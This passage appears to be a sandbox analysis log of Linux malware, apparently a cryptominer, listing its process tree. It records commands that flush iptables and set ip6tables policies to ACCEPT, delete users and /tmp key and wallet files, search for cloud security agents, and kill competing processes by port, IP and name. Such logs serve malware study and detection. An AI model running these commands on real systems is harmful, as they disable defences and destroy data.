      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:1658
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1666
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1667
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1668
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1669
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1675
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1676
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1678
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:1680
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1679
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1682
- /bin/ps
  ps aux
  2⤵
  PID:1681
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:1683
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  PID:1684
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1686
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1687
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1688
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1689
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1694
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1693
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1692
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1691
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1700
- /bin/grep
  grep -v -
  2⤵
  PID:1699
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1698
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1697
- /bin/grep
  grep :443
  2⤵
  PID:1696
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1706
- /bin/grep
  grep -v -
  2⤵
  PID:1705
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1704
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1703
- /bin/grep
  grep :23
  2⤵
  PID:1702
- /bin/grep
  grep -v -
  2⤵
  PID:1711
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1710
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1712
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1709
- /bin/grep
  grep :443
  2⤵
  PID:1708
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1718
- /bin/grep
  grep -v -
  2⤵
  PID:1717
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1716
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1715
- /bin/grep
  grep :143
  2⤵
  PID:1714
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1724
- /bin/grep
  grep -v -
  2⤵
  PID:1723
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1722
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1721
- /bin/grep
  grep :2222
  2⤵
  PID:1720
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1730
- /bin/grep
  grep -v -
  2⤵
  PID:1729
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1728
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1727
- /bin/grep
  grep :3333
  2⤵
  PID:1726
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1736
- /bin/grep
  grep -v -
  2⤵
  PID:1735
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1734
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1733
- /bin/grep
  grep :3389
  2⤵
  PID:1732
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1742
- /bin/grep
  grep -v -
  2⤵
  PID:1741
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1740
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1739
- /bin/grep
  grep :4444
  2⤵
  PID:1738
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1748
- /bin/grep
  grep -v -
  2⤵
  PID:1747
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1746
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1745
- /bin/grep
  grep :5555
  2⤵
  PID:1744
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1754
- /bin/grep
  grep -v -
  2⤵
  PID:1753
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1752
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1751
- /bin/grep
  grep :6666
  2⤵
  PID:1750
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1760
- /bin/grep
  grep -v -
  2⤵
  PID:1759
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1758
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1757
- /bin/grep
  grep :6665
  2⤵
  PID:1756
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1766
- /bin/grep
  grep -v -
  2⤵
  PID:1765
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1764
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1763
- /bin/grep
  grep :6667
  2⤵
  PID:1762
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1772
- /bin/grep
  grep -v -
  2⤵
  PID:1771
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1770
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1769
- /bin/grep
  grep :7777
  2⤵
  PID:1768
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1778
- /bin/grep
  grep -v -
  2⤵
  PID:1777
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1776
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1775
- /bin/grep
  grep :8444
  2⤵
  PID:1774
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1786
- /bin/grep
  grep -v -
  2⤵
  PID:1785
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1784
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1783
- /bin/grep
  grep :3347
  2⤵
  PID:1782
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1792
- /bin/grep
  grep -v -
  2⤵
  PID:1791
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1790
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1789
- /bin/grep
  grep :14433
  2⤵
  PID:1788
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1797
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1796
- /bin/grep
  grep :3333
  2⤵
  PID:1795
- /bin/grep
  grep -v grep
  2⤵
  PID:1794
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1805
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1804
- /bin/grep
  grep :5555
  2⤵
  PID:1803
- /bin/grep
  grep -v grep
  2⤵
  PID:1802
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1801
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1811
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1810
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1809
- /bin/grep
  grep -v grep
  2⤵
  PID:1808
- /bin/ps
  ps aux
  2⤵
  PID:1807
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1816
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1815
- /bin/grep
  grep log_
  2⤵
  PID:1814
- /bin/grep
  grep -v grep
  2⤵
  PID:1813
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1812
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1821
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1820
- /bin/grep
  grep systemten
  2⤵
  PID:1819
- /bin/grep
  grep -v grep
  2⤵
  PID:1818
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1817
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1826
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1827
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1827
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1827
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1827
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1827
- - /bin/kill
    kill -9 14
    3⤵
    - Reads CPU attributes
    PID:1827
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1825
- /bin/grep
  grep netns
  2⤵
  PID:1824
- /bin/grep
  grep -v grep
  2⤵
  PID:1823
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1822
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1832
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1831
- /bin/grep
  grep voltuned
  2⤵
  PID:1830
- /bin/grep
  grep -v grep
  2⤵
  PID:1829
- /bin/ps
  ps aux
  2⤵
  PID:1828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1837
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1836
- /bin/grep
  grep darwin
  2⤵
  PID:1835
- /bin/grep
  grep -v grep
  2⤵
  PID:1834
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1833
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1842
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1841
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1840
- /bin/grep
  grep -v grep
  2⤵
  PID:1839
- /bin/ps
  ps aux
  2⤵
  PID:1838
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1847
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1846
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1845
- /bin/grep
  grep -v grep
  2⤵
  PID:1844
- /bin/ps
  ps aux
  2⤵
  PID:1843
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1852
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1851
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1850
- /bin/grep
  grep -v grep
  2⤵
  PID:1849
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1848
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1857
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1856
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1855
- /bin/grep
  grep -v grep
  2⤵
  PID:1854
- /bin/ps
  ps aux
  2⤵
  PID:1853
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1862
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1861
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1860
- /bin/grep
  grep -v grep
  2⤵
  PID:1859
- /bin/ps
  ps aux
  2⤵
  PID:1858
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1867
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1866
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1865
- /bin/grep
  grep -v grep
  2⤵
  PID:1864
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1863
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1872
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1871
- /bin/grep
  grep -v grep
  2⤵
  PID:1869
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1870
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1868
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1876
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1875
- /bin/grep
  grep -v grep
  2⤵
  PID:1874
- /bin/ps
  ps aux
  2⤵
  PID:1873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1882
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1881
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1880
- /bin/grep
  grep -v grep
  2⤵
  PID:1879
- /bin/ps
  ps aux
  2⤵
  PID:1878
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1886
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1885
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1887
- /bin/grep
  grep -v grep
  2⤵
  PID:1884
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1883
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1892
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1891
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1890
- /bin/grep
  grep -v grep
  2⤵
  PID:1889
- /bin/ps
  ps aux
  2⤵
  PID:1888
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1897
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1896
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1895
- /bin/grep
  grep -v grep
  2⤵
  PID:1894
- /bin/ps
  ps aux
  2⤵
  PID:1893
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1902
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1901
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1900
- /bin/grep
  grep -v grep
  2⤵
  PID:1899
- /bin/ps
  ps aux
  2⤵
  PID:1898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1907
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1906
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1905
- /bin/grep
  grep -v grep
  2⤵
  PID:1904
- /bin/ps
  ps aux
  2⤵
  PID:1903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1912
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1911
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1910
- /bin/grep
  grep -v grep
  2⤵
  PID:1909
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1908
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1917
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1916
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1915
- /bin/grep
  grep -v grep
  2⤵
  PID:1914
- /bin/ps
  ps aux
  2⤵
  PID:1913
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1922
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1921
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1920
- /bin/grep
  grep -v grep
  2⤵
  PID:1919
- /bin/ps
  ps aux
  2⤵
  PID:1918
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1927
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1926
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1925
- /bin/grep
  grep -v grep
  2⤵
  PID:1924
- /bin/ps
  ps aux
  2⤵
  PID:1923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1932
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1931
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1930
- /bin/grep
  grep -v grep
  2⤵
  PID:1929
- /bin/ps
  ps aux
  2⤵
  PID:1928
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1937
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1936
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1935
- /bin/grep
  grep -v grep
  2⤵
  PID:1934
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1933
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1942
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1941
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1940
- /bin/grep
  grep -v grep
  2⤵
  PID:1939
- /bin/ps
  ps aux
  2⤵
  PID:1938
- /bin/ps
  ps aux
  2⤵
  PID:1943
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1947
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1946
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1945
- /bin/grep
  grep -v grep
  2⤵
  PID:1944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1952
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1951
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1950
- /bin/grep
  grep -v grep
  2⤵
  PID:1949
- /bin/ps
  ps aux
  2⤵
  PID:1948
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1957
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1956
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1955
- /bin/grep
  grep -v grep
  2⤵
  PID:1954
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1953
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1962
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1961
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1960
- /bin/grep
  grep -v grep
  2⤵
  PID:1959
- /bin/ps
  ps aux
  2⤵
  PID:1958
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1967
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1966
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1965
- /bin/grep
  grep -v grep
  2⤵
  PID:1964
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1963
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1972
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1971
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1970
- /bin/grep
  grep -v grep
  2⤵
  PID:1969
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1968
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1977
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1976
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1975
- /bin/grep
  grep -v grep
  2⤵
  PID:1974
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1973
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1982
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1981
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1980
- /bin/grep
  grep -v grep
  2⤵
  PID:1979
- /bin/ps
  ps aux
  2⤵
  PID:1978
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1987
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1986
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1985
- /bin/grep
  grep -v grep
  2⤵
  PID:1984
- /bin/ps
  ps aux
  2⤵
  PID:1983
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1992
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1991
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1990
- /bin/grep
  grep -v grep
  2⤵
  PID:1989
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1988
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1997
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1996
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1995
- /bin/grep
  grep -v grep
  2⤵
  PID:1994
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1993
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2002
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2001
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2000
- /bin/grep
  grep -v grep
  2⤵
  PID:1999
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1998
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2007
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2006
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2005
- /bin/grep
  grep -v grep
  2⤵
  PID:2004
- /bin/ps
  ps aux
  2⤵
  PID:2003
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2011
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2010
- /bin/grep
  grep -v grep
  2⤵
  PID:2009
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2008
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2016
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2015
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2014
- /bin/grep
  grep -v grep
  2⤵
  PID:2013
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2012
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2021
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2020
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2019
- /bin/grep
  grep -v grep
  2⤵
  PID:2018
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2017
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2026
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2025
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2024
- /bin/grep
  grep -v grep
  2⤵
  PID:2023
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2022
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2031
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2030
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2029
- /bin/grep
  grep -v grep
  2⤵
  PID:2028
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2027
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2036
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2035
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2034
- /bin/grep
  grep -v grep
  2⤵
  PID:2033
- /bin/ps
  ps aux
  2⤵
  PID:2032
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2041
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2040
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2039
- /bin/grep
  grep -v grep
  2⤵
  PID:2038
- /bin/ps
  ps aux
  2⤵
  PID:2037
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2047
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2046
- /bin/grep
  grep "]"
  2⤵
  PID:2045
- /bin/grep
  grep -v aux
  2⤵
  PID:2044
- /bin/grep
  grep -v grep
  2⤵
  PID:2043
- /bin/ps
  ps aux
  2⤵
  PID:2042
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2052
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2051
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2050
- /bin/grep
  grep -v grep
  2⤵
  PID:2049
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2048
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2057
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2056
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2055
- /bin/grep
  grep -v grep
  2⤵
  PID:2054
- /bin/ps
  ps aux
  2⤵
  PID:2053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2062
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2061
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2060
- /bin/grep
  grep -v grep
  2⤵
  PID:2059
- /bin/ps
  ps aux
  2⤵
  PID:2058
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2069
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2068
- /bin/grep
  grep -v _
  2⤵
  PID:2067
- /bin/grep
  grep -v /
  2⤵
  PID:2065
- /bin/grep
  grep -v -
  2⤵
  PID:2066
- /bin/grep
  grep -v grep
  2⤵
  PID:2064
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2063
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2074
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2073
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2072
- /bin/grep
  grep -v grep
  2⤵
  PID:2071
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2070
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2079
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2078
- /bin/grep
  grep rsync
  2⤵
  PID:2077
- /bin/grep
  grep -v grep
  2⤵
  PID:2076
- /bin/ps
  ps aux
  2⤵
  PID:2075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2083
- /bin/grep
  grep watchd0g
  2⤵
  PID:2082
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2084
- /bin/grep
  grep -v grep
  2⤵
  PID:2081
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2080
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2089
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2088
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
- /bin/grep
  grep -v grep
  2⤵
  PID:2086
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2087
